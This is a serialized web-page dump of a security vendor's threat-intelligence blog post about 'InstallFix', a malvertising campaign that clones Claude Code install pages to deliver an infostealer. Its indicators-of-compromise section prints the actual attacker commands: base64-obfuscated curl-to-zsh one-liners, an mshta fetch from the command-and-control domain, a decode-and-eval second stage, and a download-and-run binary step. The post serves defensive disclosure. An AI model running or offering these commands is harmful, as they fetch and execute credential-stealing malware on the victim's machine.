response",{"items":1935},[1936],{"fullName":232,"firstName":233,"jobTitle":234,"profilePicture":1937},{"url":236},{"__typename":964,"sys":1939,"content":1941,"title":2943,"synopsis":2944,"hashTags":62,"publishedDate":2945,"slug":2946,"tagsCollection":2947,"authorsCollection":2953},{"id":1940},"7bG71Eo43crbIHKzczooVS",{"json":1942},{"nodeType":239,"data":1943,"content":1944},{},[1945,1951,1958,1965,1973,1989,1995,1998,2006,2013,2020,2027,2034,2041,2048,2055,2062,2068,2074,2081,2087,2094,2101,2107,2113,2119,2125,2144,2156,2163,2169,2176,2183,2216,2223,2231,2238,2244,2251,2257,2264,2284,2291,2294,2302,2309,2404,2411,2417,2420,2428,2434,2441,2448,2486,2489,2496,2514,2521,2529,2739,2747,2780,2788,2797,2803,2811,2818,2826,2837,2845,2851,2859,2870,2878,2886,2894,2902,2909,2917,2928,2935],{"nodeType":274,"data":1946,"content":1950},{"target":1947},{"sys":1948},{"id":1949,"type":279,"linkType":280},"38JCcRQe2tN9ooHGwreoF5",[],{"nodeType":243,"data":1952,"content":1953},{},[1954],{"nodeType":247,"value":1955,"marks":1956,"data":1957},"There was a time, not that long ago, when pasting a command from a website straight into your terminal was something you’d only try once before some grizzled senior engineer beat it out of you. That’s because you’re effectively handing a website a blank cheque to execute whatever it wants on your system.",[],{},{"nodeType":243,"data":1959,"content":1960},{},[1961],{"nodeType":247,"value":1962,"marks":1963,"data":1964},"But somehow, it’s now the default. Homebrew, Rust, nvm, Bun, oh-my-zsh and hundreds of the most widely used developer tools on the planet now ship with the same instructions. Copy a “curl to bash” ( curl https://some.website | bash) one-liner from a website, paste it into your terminal, and hit enter. The entire security model boils down to \"trust the domain.\" And with AI adoption encouraging more non-technical users to work with the kind of tools that only devs used to use, this suddenly becomes a threat to a much larger, less security conscious pool of users.",[],{},{"nodeType":243,"data":1966,"content":1967},{},[1968],{"nodeType":247,"value":1969,"marks":1970,"data":1972},"It’s not hard to see how attackers can exploit this. ",[1971],{"type":294},{},{"nodeType":243,"data":1974,"content":1975},{},[1976,1980,1985],{"nodeType":247,"value":1977,"marks":1978,"data":1979},"We're tracking a technique we're calling ",[],{},{"nodeType":247,"value":1981,"marks":1982,"data":1984},"InstallFix",[1983],{"type":294},{},{"nodeType":247,"value":1986,"marks":1987,"data":1988},": a clever social engineering attack where threat actors clone the installation pages of legitimate CLI tools and present victims with malicious install commands disguised as the real thing. In each case, the mechanic is the same: the victim sees what looks like a familiar install command, copies it, pastes it, and runs it. Except the command they run is not the one they expected.",[],{},{"nodeType":274,"data":1990,"content":1994},{"target":1991},{"sys":1992},{"id":1993,"type":279,"linkType":280},"6VMkuQkU5L0vObxIojI1Xw",[],{"nodeType":283,"data":1996,"content":1997},{},[],{"nodeType":287,"data":1999,"content":2000},{},[2001],{"nodeType":247,"value":2002,"marks":2003,"data":2005},"InstallFix Claude Code campaign teardown",[2004],{"type":294},{},{"nodeType":243,"data":2007,"content":2008},{},[2009],{"nodeType":247,"value":2010,"marks":2011,"data":2012},"All you need to make this attack work is a popular tool you can impersonate. Naturally, this makes trendy AI tools a popular choice. Then, you just need to boost your lure to deliver it to unsuspecting victims via search engine. The most common way of doing this is through sponsored results — aka malvertising. ",[],{},{"nodeType":243,"data":2014,"content":2015},{},[2016],{"nodeType":247,"value":2017,"marks":2018,"data":2019},"In the recent examples identified by Push researchers, attackers have simply cloned the installation webpages for tools and updated the installation instructions with malicious commands. ",[],{},{"nodeType":382,"data":2021,"content":2022},{},[2023],{"nodeType":247,"value":2024,"marks":2025,"data":2026},"A new campaign targeting Claude Code",[],{},{"nodeType":243,"data":2028,"content":2029},{},[2030],{"nodeType":247,"value":2031,"marks":2032,"data":2033},"We've recently observed a campaign that puts this technique into practice against one of the fastest-growing developer tools on the market: Anthropic's Claude Code.",[],{},{"nodeType":243,"data":2035,"content":2036},{},[2037],{"nodeType":247,"value":2038,"marks":2039,"data":2040},"Claude Code is a command-line AI coding assistant that has rapidly become the go-to for both experienced developers and amateur vibe-coders. Like many modern CLI tools, the recommended installation method is a one-liner that pipes a remote script into a shell. ",[],{},{"nodeType":243,"data":2042,"content":2043},{},[2044],{"nodeType":247,"value":2045,"marks":2046,"data":2047},"The attacker's approach is straightforward. They clone the Claude Code installation page (layout, branding, documentation sidebar, and all), hosting it on a lookalike domain. The page is a near-pixel-perfect replica of the real thing. The only meaningful difference is in the installation commands themselves: instead of fetching the install script from claude.ai, the commands point to an attacker-controlled server that serves malware instead. ",[],{},{"nodeType":243,"data":2049,"content":2050},{},[2051],{"nodeType":247,"value":2052,"marks":2053,"data":2054},"Unless you’re carefully reading the URL embedded in the install one-liner (and let's be honest, almost nobody does these days), the page is indistinguishable from the real one.",[],{},{"nodeType":243,"data":2056,"content":2057},{},[2058],{"nodeType":247,"value":2059,"marks":2060,"data":2061},"You can see a video of a user being served a malicious InstallFix page below.",[],{},{"nodeType":274,"data":2063,"content":2067},{"target":2064},{"sys":2065},{"id":2066,"type":279,"linkType":280},"1dhirnghbpAwyCse8cjAas",[],{"nodeType":274,"data":2069,"content":2073},{"target":2070},{"sys":2071},{"id":2072,"type":279,"linkType":280},"5TBnCFM4Y5CoqKPchHDpyv",[],{"nodeType":243,"data":2075,"content":2076},{},[2077],{"nodeType":247,"value":2078,"marks":2079,"data":2080},"Any further interaction on the page simply redirects you to the legitimate site, too. So a victim that lands on the page and follows the fake instructions could continue normally without realizing anything had gone wrong. ",[],{},{"nodeType":274,"data":2082,"content":2086},{"target":2083},{"sys":2084},{"id":2085,"type":279,"linkType":280},"5g3joJSAP8y8xv2bKaLGe2",[],{"nodeType":382,"data":2088,"content":2089},{},[2090],{"nodeType":247,"value":2091,"marks":2092,"data":2093},"Distribution via Google Ads",[],{},{"nodeType":243,"data":2095,"content":2096},{},[2097],{"nodeType":247,"value":2098,"marks":2099,"data":2100},"The fake install pages are distributed exclusively through Google Ads, specifically through sponsored search results that appear when users search for terms like \"Claude Code\", \"Claude Code install\", or \"Claude Code CLI.\"",[],{},{"nodeType":274,"data":2102,"content":2106},{"target":2103},{"sys":2104},{"id":2105,"type":279,"linkType":280},"3CTtrOy3q8NoMblxkLlTer",[],{"nodeType":274,"data":2108,"content":2112},{"target":2109},{"sys":2110},{"id":2111,"type":279,"linkType":280},"4m5rg9UhRQK0e8OfYFlIUc",[],{"nodeType":274,"data":2114,"content":2118},{"target":2115},{"sys":2116},{"id":2117,"type":279,"linkType":280},"25lAkq9tTZ2Mq52gs6xR8G",[],{"nodeType":274,"data":2120,"content":2124},{"target":2121},{"sys":2122},{"id":2123,"type":279,"linkType":280},"4f4svuW3tjhNc3kEfCwNRG",[],{"nodeType":243,"data":2126,"content":2127},{},[2128,2132,2140],{"nodeType":247,"value":2129,"marks":2130,"data":2131},"Malvertising via Google Search is an effective delivery vector because it bypasses email-based security controls entirely. There's no phishing email to flag, no suspicious link in a message. The user initiates the interaction themselves by searching for something they genuinely intend to install. This is one of the reasons that attackers are ",[],{},{"nodeType":259,"data":2133,"content":2134},{"uri":546},[2135],{"nodeType":247,"value":2136,"marks":2137,"data":2139},"doubling down on targeting ad manager accounts",[2138],{"type":267},{},{"nodeType":247,"value":2141,"marks":2142,"data":2143}," to be able to hijack existing ad budgets and spin up even more malicious ads.",[],{},{"nodeType":243,"data":2145,"content":2146},{},[2147,2152],{"nodeType":247,"value":2148,"marks":2149,"data":2151},"The reality is that users are going to encounter malicious links through stealthy channels like malvertising every day, just through normal internet browsing",[2150],{"type":294},{},{"nodeType":247,"value":2153,"marks":2154,"data":2155},", without being actively targeted. That said, ads can be targeted too: Google Ads can be tuned to searches coming from specific geographic locations, tailored to specific email domain matches, or specific device types (e.g. desktop, mobile, etc.). So if you've got sufficient intel on your target, you can tailor the ad accordingly. ",[],{},{"nodeType":243,"data":2157,"content":2158},{},[2159],{"nodeType":247,"value":2160,"marks":2161,"data":2162},"Since the sponsored result appears above the organic results for the legitimate Claude Code documentation and the displayed URL in the ad appears plausible, victims are more likely to quickly click and access the domain without checking it out fully. Search engines typically suppress subdomains from displayed URLs too, giving the attacker additional cover for the lookalike domain.",[],{},{"nodeType":274,"data":2164,"content":2168},{"target":2165},{"sys":2166},{"id":2167,"type":279,"linkType":280},"4Ihz5BcRK0NDVy0ANg2PWe",[],{"nodeType":382,"data":2170,"content":2171},{},[2172],{"nodeType":247,"value":2173,"marks":2174,"data":2175},"The payload",[],{},{"nodeType":243,"data":2177,"content":2178},{},[2179],{"nodeType":247,"value":2180,"marks":2181,"data":2182},"The malware initiates execution through cmd.exe (PID 8444), which spawns mshta.exe (PID 8700) to retrieve and execute content from a remote URL. The command structure indicates staged execution:",[],{},{"nodeType":318,"data":2184,"content":2185},{},[2186,2196,2206],{"nodeType":322,"data":2187,"content":2188},{},[2189],{"nodeType":243,"data":2190,"content":2191},{},[2192],{"nodeType":247,"value":2193,"marks":2194,"data":2195},"cmd.exe executes a command-line instruction to launch mshta.exe with a URL parameter pointing to https://claude[.]update-version[.]com/claude",[],{},{"nodeType":322,"data":2197,"content":2198},{},[2199],{"nodeType":243,"data":2200,"content":2201},{},[2202],{"nodeType":247,"value":2203,"marks":2204,"data":2205},"mshta.exe (child process) is invoked to fetch and execute HTML/script content from the malicious domain",[],{},{"nodeType":322,"data":2207,"content":2208},{},[2209],{"nodeType":243,"data":2210,"content":2211},{},[2212],{"nodeType":247,"value":2213,"marks":2214,"data":2215},"conhost.exe (PID 8496) is spawned as a console host, likely to support command execution output",[],{},{"nodeType":243,"data":2217,"content":2218},{},[2219],{"nodeType":247,"value":2220,"marks":2221,"data":2222},"The MacOS payload also uses additional encoding and staged execution layers.",[],{},{"nodeType":243,"data":2224,"content":2225},{},[2226],{"nodeType":247,"value":2227,"marks":2228,"data":2230},"You can see the full list of IoCs at the end of the blog.   ",[2229],{"type":294},{},{"nodeType":243,"data":2232,"content":2233},{},[2234],{"nodeType":247,"value":2235,"marks":2236,"data":2237},"Our analysis shows us that the payload matches the Yara signatures for the Amatera Stealer malware, retrieved from the command-and-control domain claude[.]update-version[.]com.",[],{},{"nodeType":274,"data":2239,"content":2243},{"target":2240},{"sys":2241},{"id":2242,"type":279,"linkType":280},"TXcSp34sIAOKIXlKT4Lb0",[],{"nodeType":243,"data":2245,"content":2246},{},[2247],{"nodeType":247,"value":2248,"marks":2249,"data":2250},"Notably, we saw different sites executing identical binaries, further indicating that these are part of a single attacker campaign. ",[],{},{"nodeType":274,"data":2252,"content":2256},{"target":2253},{"sys":2254},{"id":2255,"type":279,"linkType":280},"3ExLtcl6df07BcKPsGZn42",[],{"nodeType":382,"data":2258,"content":2259},{},[2260],{"nodeType":247,"value":2261,"marks":2262,"data":2263},"Abusing legitimate hosting services",[],{},{"nodeType":243,"data":2265,"content":2266},{},[2267,2271,2280],{"nodeType":247,"value":2268,"marks":2269,"data":2270},"Another common theme we see across pretty much every phishing site these days is the abuse of legitimate domains for hosting malicious content. This allows attackers to blend in with normal web traffic and is a core ",[],{},{"nodeType":259,"data":2272,"content":2274},{"uri":2273},"https://phishing-techniques.pushsecurity.com/",[2275],{"nodeType":247,"value":2276,"marks":2277,"data":2279},"detection evasion technique",[2278],{"type":267},{},{"nodeType":247,"value":2281,"marks":2282,"data":2283},". ",[],{},{"nodeType":243,"data":2285,"content":2286},{},[2287],{"nodeType":247,"value":2288,"marks":2289,"data":2290},"In this case, we observed Cloudflare Pages (pages.dev), Squarespace, and Tencent EdgeOne being used. ",[],{},{"nodeType":283,"data":2292,"content":2293},{},[],{"nodeType":287,"data":2295,"content":2296},{},[2297],{"nodeType":247,"value":2298,"marks":2299,"data":2301},"A broader trend",[2300],{"type":294},{},{"nodeType":243,"data":2303,"content":2304},{},[2305],{"nodeType":247,"value":2306,"marks":2307,"data":2308},"This isn't happening in isolation. Claude and its associated tools have become a recurring target for recent malware distribution campaigns:",[],{},{"nodeType":318,"data":2310,"content":2311},{},[2312,2335,2358,2381],{"nodeType":322,"data":2313,"content":2314},{},[2315],{"nodeType":243,"data":2316,"content":2317},{},[2318,2321,2331],{"nodeType":247,"value":29,"marks":2319,"data":2320},[],{},{"nodeType":259,"data":2322,"content":2324},{"uri":2323},"https://www.bleepingcomputer.com/news/security/claude-llm-artifacts-abused-to-push-mac-infostealers-in-clickfix-attack/",[2325],{"nodeType":247,"value":2326,"marks":2327,"data":2330},"Fake Claude artifacts used in traditional ClickFix lures",[2328,2329],{"type":267},{"type":294},{},{"nodeType":247,"value":2332,"marks":2333,"data":2334},": Attackers created public pages on the claude.ai domain itself (user-generated content that inherited the domain's trust) containing malicious terminal commands disguised as macOS utilities. These were promoted via hijacked Google Ads and viewed over 15,000 times before being taken down.",[],{},{"nodeType":322,"data":2336,"content":2337},{},[2338],{"nodeType":243,"data":2339,"content":2340},{},[2341,2344,2354],{"nodeType":247,"value":29,"marks":2342,"data":2343},[],{},{"nodeType":259,"data":2345,"content":2347},{"uri":2346},"https://hunt.io/blog/fake-homebrew-clickfix-cuckoo-stealer-macos",[2348],{"nodeType":247,"value":2349,"marks":2350,"data":2353},"Fake Homebrew installation pages",[2351,2352],{"type":267},{"type":294},{},{"nodeType":247,"value":2355,"marks":2356,"data":2357},": Near-identical clones of the Homebrew website delivering the Cuckoo infostealer to macOS users, using the same \"copy this install command\" mechanic.",[],{},{"nodeType":322,"data":2359,"content":2360},{},[2361],{"nodeType":243,"data":2362,"content":2363},{},[2364,2367,2377],{"nodeType":247,"value":29,"marks":2365,"data":2366},[],{},{"nodeType":259,"data":2368,"content":2370},{"uri":2369},"https://www.huntress.com/blog/openclaw-github-ghostsocks-infostealer",[2371],{"nodeType":247,"value":2372,"marks":2373,"data":2376},"Fake OpenClaw installers on GitHub",[2374,2375],{"type":267},{"type":294},{},{"nodeType":247,"value":2378,"marks":2379,"data":2380},": Malicious repositories impersonating the popular AI agent tool, boosted by Bing's AI search results, delivering infostealers and the GhostSocks proxy malware.",[],{},{"nodeType":322,"data":2382,"content":2383},{},[2384],{"nodeType":243,"data":2385,"content":2386},{},[2387,2390,2400],{"nodeType":247,"value":29,"marks":2388,"data":2389},[],{},{"nodeType":259,"data":2391,"content":2393},{"uri":2392},"https://thehackernews.com/2026/02/malicious-npm-packages-harvest-crypto.html",[2394],{"nodeType":247,"value":2395,"marks":2396,"data":2399},"Trojanised npm packages",[2397,2398],{"type":267},{"type":294},{},{"nodeType":247,"value":2401,"marks":2402,"data":2403},": Malicious packages mimicking Claude Code's official npm package name, targeting developers who might make a typo or trust an unofficial source.",[],{},{"nodeType":243,"data":2405,"content":2406},{},[2407],{"nodeType":247,"value":2408,"marks":2409,"data":2410},"But this isn’t just a Claude problem — any tool or site that is likely to get clicks, and can be easily cloned, is a potential target for malvertising and impersonation. For example, we’ve also recently seen attackers target free web tools with clever ClickFix lures that only load after an attacker has interacted with the page — in the example below, uploading a file to remove an image background, or convert a document to PDF. These are clones of real sites that attackers have cloned because they allow them to intercept users entering common search terms. ",[],{},{"nodeType":274,"data":2412,"content":2416},{"target":2413},{"sys":2414},{"id":2415,"type":279,"linkType":280},"6fbQRdi1xXzMOmYTcAGDLc",[],{"nodeType":283,"data":2418,"content":2419},{},[],{"nodeType":382,"data":2421,"content":2422},{},[2423],{"nodeType":247,"value":2424,"marks":2425,"data":2427},"How Push detects InstallFix",[2426],{"type":294},{},{"nodeType":243,"data":2429,"content":2430},{},[2431],{"nodeType":247,"value":782,"marks":2432,"data":2433},[],{},{"nodeType":243,"data":2435,"content":2436},{},[2437],{"nodeType":247,"value":2438,"marks":2439,"data":2440},"Push sees what the user sees: the page as it renders in the browser, in real time. This means we can detect InstallFix pages by identifying the combination of signals that characterise them: lookalike domains impersonating known developer tools, copy-to-clipboard elements containing shell commands, and the presence of malvertising delivery indicators.",[],{},{"nodeType":243,"data":2442,"content":2443},{},[2444],{"nodeType":247,"value":2445,"marks":2446,"data":2447},"Because Push detects threats directly in the browser, it doesn't matter that the attack came from a Google Search ad rather than an email. There's no phishing email for a Secure Email Gateway to inspect — the user searched for and navigated to the page themselves. But the page still loads in the browser, where Push is there to catch it.",[],{},{"nodeType":243,"data":2449,"content":2450},{},[2451,2455,2462,2465,2473,2476,2483],{"nodeType":247,"value":2452,"marks":2453,"data":2454},"To learn more about how Push protects against InstallFix, ClickFix, and other browser-based attacks, ",[],{},{"nodeType":259,"data":2456,"content":2457},{"uri":801},[2458],{"nodeType":247,"value":804,"marks":2459,"data":2461},[2460],{"type":267},{},{"nodeType":247,"value":809,"marks":2463,"data":2464},[],{},{"nodeType":259,"data":2466,"content":2467},{"uri":814},[2468],{"nodeType":247,"value":2469,"marks":2470,"data":2472},"visit our demo library",[2471],{"type":267},{},{"nodeType":247,"value":822,"marks":2474,"data":2475},[],{},{"nodeType":259,"data":2477,"content":2478},{"uri":827},[2479],{"nodeType":247,"value":830,"marks":2480,"data":2482},[2481],{"type":267},{},{"nodeType":247,"value":580,"marks":2484,"data":2485},[],{},{"nodeType":283,"data":2487,"content":2488},{},[],{"nodeType":287,"data":2490,"content":2491},{},[2492],{"nodeType":247,"value":596,"marks":2493,"data":2495},[2494],{"type":294},{},{"nodeType":243,"data":2497,"content":2498},{},[2499,2503,2510],{"nodeType":247,"value":2500,"marks":2501,"data":2502},"As we always say, short-lived IoCs are of limited value when tackling modern phishing attacks due to the rate at which attackers are able to ",[],{},{"nodeType":259,"data":2504,"content":2505},{"uri":609},[2506],{"nodeType":247,"value":612,"marks":2507,"data":2509},[2508],{"type":267},{},{"nodeType":247,"value":2511,"marks":2512,"data":2513}," in the attack chain. IoC-based detections for campaigns like this are of limited value.",[],{},{"nodeType":243,"data":2515,"content":2516},{},[2517],{"nodeType":247,"value":2518,"marks":2519,"data":2520},"This is a fast-moving situation, with domains constantly being spun up. At the time of writing, the domains observed were:",[],{},{"nodeType":243,"data":2522,"content":2523},{},[2524],{"nodeType":247,"value":2525,"marks":2526,"data":2528},"Cloned domains:",[2527],{"type":294},{},{"nodeType":318,"data":2530,"content":2531},{},[2532,2542,2552,2562,2572,2582,2591,2601,2611,2620,2630,2640,2650,2660,2670,2680,2690,2699,2709,2719,2729],{"nodeType":322,"data":2533,"content":2534},{},[2535],{"nodeType":243,"data":2536,"content":2537},{},[2538],{"nodeType":247,"value":2539,"marks":2540,"data":2541},"claud-code[.]pages[.]dev",[],{},{"nodeType":322,"data":2543,"content":2544},{},[2545],{"nodeType":243,"data":2546,"content":2547},{},[2548],{"nodeType":247,"value":2549,"marks":2550,"data":2551},"claulastver[.]squarespace[.]com",[],{},{"nodeType":322,"data":2553,"content":2554},{},[2555],{"nodeType":243,"data":2556,"content":2557},{},[2558],{"nodeType":247,"value":2559,"marks":2560,"data":2561},"claudecode-developers[.]squarespace[.]com",[],{},{"nodeType":322,"data":2563,"content":2564},{},[2565],{"nodeType":243,"data":2566,"content":2567},{},[2568],{"nodeType":247,"value":2569,"marks":2570,"data":2571},"hgjbulk.pages[.]dev",[],{},{"nodeType":322,"data":2573,"content":2574},{},[2575],{"nodeType":243,"data":2576,"content":2577},{},[2578],{"nodeType":247,"value":2579,"marks":2580,"data":2581},"jhgyuifyfiguohi[.]pages[.]dev",[],{},{"nodeType":322,"data":2583,"content":2584},{},[2585],{"nodeType":243,"data":2586,"content":2587},{},[2588],{"nodeType":247,"value":2569,"marks":2589,"data":2590},[],{},{"nodeType":322,"data":2592,"content":2593},{},[2594],{"nodeType":243,"data":2595,"content":2596},{},[2597],{"nodeType":247,"value":2598,"marks":2599,"data":2600},"claude-code-install[.]squarespace[.]com",[],{},{"nodeType":322,"data":2602,"content":2603},{},[2604],{"nodeType":243,"data":2605,"content":2606},{},[2607],{"nodeType":247,"value":2608,"marks":2609,"data":2610},"claude-code-docs-site[.]pages[.]dev",[],{},{"nodeType":322,"data":2612,"content":2613},{},[2614],{"nodeType":243,"data":2615,"content":2616},{},[2617],{"nodeType":247,"value":2549,"marks":2618,"data":2619},[],{},{"nodeType":322,"data":2621,"content":2622},{},[2623],{"nodeType":243,"data":2624,"content":2625},{},[2626],{"nodeType":247,"value":2627,"marks":2628,"data":2629},"cladueall[.]pages[.]dev",[],{},{"nodeType":322,"data":2631,"content":2632},{},[2633],{"nodeType":243,"data":2634,"content":2635},{},[2636],{"nodeType":247,"value":2637,"marks":2638,"data":2639},"claude-code-docs-dvlr2jpuuw[.]edgeone[.]app",[],{},{"nodeType":322,"data":2641,"content":2642},{},[2643],{"nodeType":243,"data":2644,"content":2645},{},[2646],{"nodeType":247,"value":2647,"marks":2648,"data":2649},"myclauda[.]it[.]com",[],{},{"nodeType":322,"data":2651,"content":2652},{},[2653],{"nodeType":243,"data":2654,"content":2655},{},[2656],{"nodeType":247,"value":2657,"marks":2658,"data":2659},"vdsafsaf[.]it[.]com",[],{},{"nodeType":322,"data":2661,"content":2662},{},[2663],{"nodeType":243,"data":2664,"content":2665},{},[2666],{"nodeType":247,"value":2667,"marks":2668,"data":2669},"asdasdasdadsvvvvv[.]pages[.]dev/",[],{},{"nodeType":322,"data":2671,"content":2672},{},[2673],{"nodeType":243,"data":2674,"content":2675},{},[2676],{"nodeType":247,"value":2677,"marks":2678,"data":2679},"nnnnnnnnnnnnnnnnnnnnn[.]pages[.]dev",[],{},{"nodeType":322,"data":2681,"content":2682},{},[2683],{"nodeType":243,"data":2684,"content":2685},{},[2686],{"nodeType":247,"value":2687,"marks":2688,"data":2689},"claude-code-macos[.]com",[],{},{"nodeType":322,"data":2691,"content":2692},{},[2693],{"nodeType":243,"data":2694,"content":2695},{},[2696],{"nodeType":247,"value":2608,"marks":2697,"data":2698},[],{},{"nodeType":322,"data":2700,"content":2701},{},[2702],{"nodeType":243,"data":2703,"content":2704},{},[2705],{"nodeType":247,"value":2706,"marks":2707,"data":2708},"claude-code-update[.]squarespace[.]com",[],{},{"nodeType":322,"data":2710,"content":2711},{},[2712],{"nodeType":243,"data":2713,"content":2714},{},[2715],{"nodeType":247,"value":2716,"marks":2717,"data":2718},"claudecodeupdate[.]squarespace[.]com",[],{},{"nodeType":322,"data":2720,"content":2721},{},[2722],{"nodeType":243,"data":2723,"content":2724},{},[2725],{"nodeType":247,"value":2726,"marks":2727,"data":2728},"notebooklm-version-upd[.]squarespace[.]com",[],{},{"nodeType":322,"data":2730,"content":2731},{},[2732],{"nodeType":243,"data":2733,"content":2734},{},[2735],{"nodeType":247,"value":2736,"marks":2737,"data":2738},"notklmalans[.]pages[.]dev",[],{},{"nodeType":243,"data":2740,"content":2741},{},[2742],{"nodeType":247,"value":2743,"marks":2744,"data":2746},"Domains hosting malicious payload:",[2745],{"type":294},{},{"nodeType":318,"data":2748,"content":2749},{},[2750,2760,2770],{"nodeType":322,"data":2751,"content":2752},{},[2753],{"nodeType":243,"data":2754,"content":2755},{},[2756],{"nodeType":247,"value":2757,"marks":2758,"data":2759},"contatoplus[.]com",[],{},{"nodeType":322,"data":2761,"content":2762},{},[2763],{"nodeType":243,"data":2764,"content":2765},{},[2766],{"nodeType":247,"value":2767,"marks":2768,"data":2769},"sarahmoftah[.]com",[],{},{"nodeType":322,"data":2771,"content":2772},{},[2773],{"nodeType":243,"data":2774,"content":2775},{},[2776],{"nodeType":247,"value":2777,"marks":2778,"data":2779},"claude[.]update-version[.]com",[],{},{"nodeType":243,"data":2781,"content":2782},{},[2783],{"nodeType":247,"value":2784,"marks":2785,"data":2787},"Commands:",[2786],{"type":294},{},{"nodeType":243,"data":2789,"content":2790},{},[2791],{"nodeType":247,"value":2792,"marks":2793,"data":2796},"curl -ksfLS $(echo 'aHR0cHM6Ly9jb250YXRvcGx1cy5jb20vY3VybC84ZDJkMjc1MzYwYWRlZGVjZmJiZDkxNTY3ZGFkZGVlZDgwZDIwYWNlYjhhYTQzMjBkMDZhMjE0ODY0OTM5NDVi'|base64 -D)| zsh",[2794],{"type":2795},"code",{},{"nodeType":243,"data":2798,"content":2799},{},[2800],{"nodeType":247,"value":29,"marks":2801,"data":2802},[],{},{"nodeType":243,"data":2804,"content":2805},{},[2806],{"nodeType":247,"value":2807,"marks":2808,"data":2810},"curl -sfkSL $(echo 'aHR0cHM6Ly93cmljb25zdWx0LmNvbS9jdXJsLzhhZjY1YmEzODg1ZDZlMjU5NmVhMmNlMmRiNGEzYmM1ZWUwMmI4ZGViMzM2ZjlhZTkzZTI2MmM0ZGIwMGI3NTc='|base64 -D)| zsh",[2809],{"type":2795},{},{"nodeType":243,"data":2812,"content":2813},{},[2814],{"nodeType":247,"value":2815,"marks":2816,"data":2817},"\n",[],{},{"nodeType":243,"data":2819,"content":2820},{},[2821],{"nodeType":247,"value":2822,"marks":2823,"data":2825},"C:\\Windows\\SysWOW64\\mshta.exe https://claude.update-version.com/claude ",[2824],{"type":2795},{},{"nodeType":243,"data":2827,"content":2828},{},[2829,2832],{"nodeType":247,"value":2815,"marks":2830,"data":2831},[],{},{"nodeType":247,"value":2833,"marks":2834,"data":2836},"Base64 decoded url:",[2835],{"type":294},{},{"nodeType":243,"data":2838,"content":2839},{},[2840],{"nodeType":247,"value":2841,"marks":2842,"data":2844},"contatoplus[.]com/curl/8d2d275360adedecfbbd91567daddeed80d20aceb8aa4320d06a21486493945b ",[2843],{"type":2795},{},{"nodeType":243,"data":2846,"content":2847},{},[2848],{"nodeType":247,"value":29,"marks":2849,"data":2850},[],{},{"nodeType":243,"data":2852,"content":2853},{},[2854],{"nodeType":247,"value":2855,"marks":2856,"data":2858},"saramoftah[.]com/curl/958ca005af6a71be22cfcd5de82ebf5c8b809b7ee28999b6ed38bfe5d19420",[2857],{"type":2795},{},{"nodeType":243,"data":2860,"content":2861},{},[2862,2865],{"nodeType":247,"value":2815,"marks":2863,"data":2864},[],{},{"nodeType":247,"value":2866,"marks":2867,"data":2869},"Second stage:",[2868],{"type":294},{},{"nodeType":243,"data":2871,"content":2872},{},[2873],{"nodeType":247,"value":2874,"marks":2875,"data":2877},"#!/bin/zsh",[2876],{"type":2795},{},{"nodeType":243,"data":2879,"content":2880},{},[2881],{"nodeType":247,"value":2882,"marks":2883,"data":2885},"mkgrc9=$(base64 -D \u003C\u003C'PAYLOAD_END' | gunzip",[2884],{"type":2795},{},{"nodeType":243,"data":2887,"content":2888},{},[2889],{"nodeType":247,"value":2890,"marks":2891,"data":2893},"H4sIAKgRpGkC/13LPQqAMAxA4b2niAhdpGYVbxPbSoT+0UYonl5HdXwfvHHA7Uh4NVb2rAFMBpRYkH0ovgKLlLYiNqoU8y7Es80R05LwLI7Eg9bQSaSCsZ/zccsxO5j631+pbrYTnkSAAAAA",[2892],{"type":2795},{},{"nodeType":243,"data":2895,"content":2896},{},[2897],{"nodeType":247,"value":2898,"marks":2899,"data":2901},"PAYLOAD_END",[2900],{"type":2795},{},{"nodeType":243,"data":2903,"content":2904},{},[2905],{"nodeType":247,"value":1706,"marks":2906,"data":2908},[2907],{"type":2795},{},{"nodeType":243,"data":2910,"content":2911},{},[2912],{"nodeType":247,"value":2913,"marks":2914,"data":2916},"eval \"$mkgrc9\"",[2915],{"type":2795},{},{"nodeType":243,"data":2918,"content":2919},{},[2920,2923],{"nodeType":247,"value":2815,"marks":2921,"data":2922},[],{},{"nodeType":247,"value":2924,"marks":2925,"data":2927},"Binaries:",[2926],{"type":294},{},{"nodeType":243,"data":2929,"content":2930},{},[2931],{"nodeType":247,"value":2874,"marks":2932,"data":2934},[2933],{"type":2795},{},{"nodeType":243,"data":2936,"content":2937},{},[2938],{"nodeType":247,"value":2939,"marks":2940,"data":2942},"curl -o /tmp/helper https://saramoftah.com/n8n/update && xattr -c /tmp/helper && chmod +x /tmp/helper && /tmp/helper",[2941],{"type":2795},{},"InstallFix: How attackers are weaponizing malvertised install guides  ","Attackers are impersonating popular developer tools like Claude Code to distribute fake install instructions via malicious search engine ads.","2026-03-06T00:00:00.000Z","installfix",{"items":2948},[2949,2951],{"sys":2950,"name":1929},{"id":1928},{"sys":2952,"name":1933},{"id":1932},{"items":2954},[2955],{"fullName":2956,"firstName":2957,"jobTitle":2958,"profilePicture":2959},"Jacques Louw","Jacques","Co-founder / CRO",{"url":2960},"https://images.ctfassets.net/y1cdw1ablpvd/39m8bektV23lnCRcEq0G8h/2a08f6276a50744f1a4b499b273f6bb2/Push_Founders_at_Cahoots_October_28_2022_by_Doug_Coombe-21.jpg",{"__typename":964,"sys":2962,"content":2964,"title":3566,"synopsis":3567,"hashTags":62,"publishedDate":3568,"slug":3569,"tagsCollection":3570,"authorsCollection":3576},{"id":2963},"2YmiesBvJHGw4wiKEKzLUq",{"json":2965},{"nodeType":239,"data":2966,"content":2967},{},[2968,2975,2982,3031,3037,3044,3051,3057,3063,3069,3072,3080,3087,3093,3100,3106,3112,3119,3125,3142,3145,3153,3160,3167,3174,3181,3187,3205,3208,3216,3223,3281,3288,3295,3298,3306,3313,3320,3327,3353,3356,3363,3379,3386,3429,3436,3479,3486,3559],{"nodeType":243,"data":2969,"content":2970},{},[2971],{"nodeType":247,"value":2972,"marks":2973,"data":2974},"In recent months, we’ve seen a significant increase in the number of attacks targeting ad manager accounts. These attacks ultimately serve up an Attacker-in-the-Middle (AITM) phishing page designed to steal the victim’s Google account. ",[],{},{"nodeType":243,"data":2976,"content":2977},{},[2978],{"nodeType":247,"value":2979,"marks":2980,"data":2981},"Most recently, we reported on:",[],{},{"nodeType":318,"data":2983,"content":2984},{},[2985,3008],{"nodeType":322,"data":2986,"content":2987},{},[2988],{"nodeType":243,"data":2989,"content":2990},{},[2991,2995,3004],{"nodeType":247,"value":2992,"marks":2993,"data":2994},"A campaign running ",[],{},{"nodeType":259,"data":2996,"content":2998},{"uri":2997},"https://pushsecurity.com/blog/analysing-a-malvertising-attack-targeting-business-google-accounts/",[2999],{"nodeType":247,"value":3000,"marks":3001,"data":3003},"fake malvertising ads for “Google 